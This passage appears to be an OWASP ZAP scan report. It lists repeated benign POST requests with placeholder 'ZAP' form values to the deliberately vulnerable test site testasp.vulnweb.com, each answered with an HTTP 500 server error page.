<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:07 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
